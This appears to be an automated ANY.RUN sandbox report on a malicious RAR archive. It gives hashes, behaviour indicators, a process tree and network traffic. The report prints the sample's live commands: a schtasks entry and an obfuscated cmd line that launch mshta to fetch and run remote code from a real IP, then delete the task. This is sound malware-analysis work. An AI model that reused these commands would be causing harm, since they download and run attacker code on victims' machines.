File name:

Desktop.rar

Full analysis: https://app.any.run/tasks/f727491a-9daf-4257-9dde-ce9380c2a17d
Verdict: Malicious activity
Analysis date: January 17, 2019, 17:52:49
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/x-rar
File info: RAR archive data, v5
MD5:

2EC6AF0E63968EEA13347E8C4144462C

SHA1:

E9F7AE588189588630FBD2ED0E9AF613377D9871

SHA256:

06122B0FE36AB6046C6CF925AA720F8D927613300224AE8748420F9FCCE5F8E9

SSDEEP:

96:ZS6IMNRldaU+N55iRx4kXo3w/QVyPVX2LrA7d2S6Lb0HwfG+jS:MMrat5iRPYA/oSXGrAZsY8G+W

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3356)

    • Uses Task Scheduler to run other applications

      • hh.exe (PID: 612)
      • cmd.exe (PID: 2628)

    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 3636)
      • schtasks.exe (PID: 3304)

  • SUSPICIOUS

    • Reads internet explorer settings

      • hh.exe (PID: 612)

    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • cmd.exe (PID: 2628)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3356)
      • WINWORD.EXE (PID: 3972)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3356)
      • WINWORD.EXE (PID: 3972)

    • Reads internet explorer settings

      • mshta.exe (PID: 2420)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rar | RAR compressed archive (v5.0) (61.5)
.rar | RAR compressed archive (gen) (38.4)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
46
Monitored processes
8
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs winword.exe no specs winword.exe no specs hh.exe no specs schtasks.exe no specs cmd.exe no specs mshta.exe schtasks.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
612"C:\Windows\hh.exe" C:\Users\admin\AppData\Local\Temp\1.CHMC:\Windows\hh.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® HTML Help Executable
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\hh.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\hhctrl.ocx
c:\windows\system32\user32.dll
2420C:\Windows\System32\mshta Http://146.0.77.104/mnms C:\Windows\System32\mshta.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\mshta.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\mshtml.dll
c:\windows\system32\psapi.dll
2628C:\Windows\System32\cmd.exe /c st%ALLUSERSPROFILE:~8,1%rt C:\Windows\System32\msht%ALLUSERSPROFILE:~8,1% H%ALLUSERSPROFILE:~12,1%%ALLUSERSPROFILE:~12,1%p://146.0.77.104/%ALLUSERSPROFILE:~9,1%n%ALLUSERSPROFILE:~9,1%s && schtasks.exe /delete /tn 4 /fC:\Windows\System32\cmd.exetaskeng.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2956"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Desktop.rar"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.60.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
3304schtasks.exe /delete /tn 4 /fC:\Windows\system32\schtasks.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\schtasks.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
3356"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Nuevo Documento de Microsoft Word (2).docx"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
3636"C:\Windows\System32\schtasks.exe" /create /tn 4 /tr " C:\Windows\System32\cmd.exe /c st%ALLUSERSPROFILE:~8,1%rt C:\Windows\System32\msht%ALLUSERSPROFILE:~8,1% H%ALLUSERSPROFILE:~12,1%%ALLUSERSPROFILE:~12,1%p://146.0.77.104/%ALLUSERSPROFILE:~9,1%n%ALLUSERSPROFILE:~9,1%s && schtasks.exe /delete /tn 4 /f" /sc minute /FC:\Windows\System32\schtasks.exehh.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\schtasks.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
3972"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Nuevo Documento de Microsoft Word (2).docx"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
Total events
3 378
Read events
2 534
Write events
809
Delete events
35

Modification events

(PID) Process:(2956) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtBMP
Value:
(PID) Process:(2956) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtIcon
Value:
(PID) Process:(2956) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(2956) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\AppData\Local\Temp\Desktop.rar
(PID) Process:(2956) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(2956) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(2956) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(2956) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(2956) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
Operation:writeName:@C:\Windows\System32\hhctrl.ocx,-452
Value:
Compiled HTML Help file
(PID) Process:(2956) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\MainWin
Operation:writeName:Placement
Value:
2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF42000000420000000204000037020000
Executable files
0
Suspicious files
2
Text files
17
Unknown types
17

Dropped files

PID
Process
Filename
Type
3972WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRAECE.tmp.cvr
MD5:
SHA256:
3972WINWORD.EXEC:\Users\admin\AppData\Local\Temp\1.CHM
MD5:
SHA256:
3972WINWORD.EXEC:\Users\admin\Desktop\~WRD0000.tmp
MD5:
SHA256:
3972WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{09E2507A-DF3C-4753-B3C7-3FEC18D214F0}.tmp
MD5:
SHA256:
3972WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{9E3BB698-4173-41FB-AA41-3B6E1B081B10}.tmp
MD5:
SHA256:
3356WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRB08F.tmp.cvr
MD5:
SHA256:
612hh.exeC:\Users\admin\AppData\Local\Temp\IMTCD3.tmp
MD5:
SHA256:
612hh.exeC:\Users\admin\AppData\Local\Temp\~DFF7E6534E0CC4BC68.TMP
MD5:
SHA256:
612hh.exeC:\Users\admin\AppData\Local\Temp\~DFCA0A2ABDB8EC85B5.TMP
MD5:
SHA256:
3972WINWORD.EXEC:\Users\admin\AppData\Local\Temp\1 (2).CHMchi
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
0
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2420
mshta.exe
GET
146.0.77.104:80
http://146.0.77.104/mnms
NL
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2420
mshta.exe
146.0.77.104:80
Hostkey B.v.
NL
malicious

DNS requests

No data

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Desktop.rar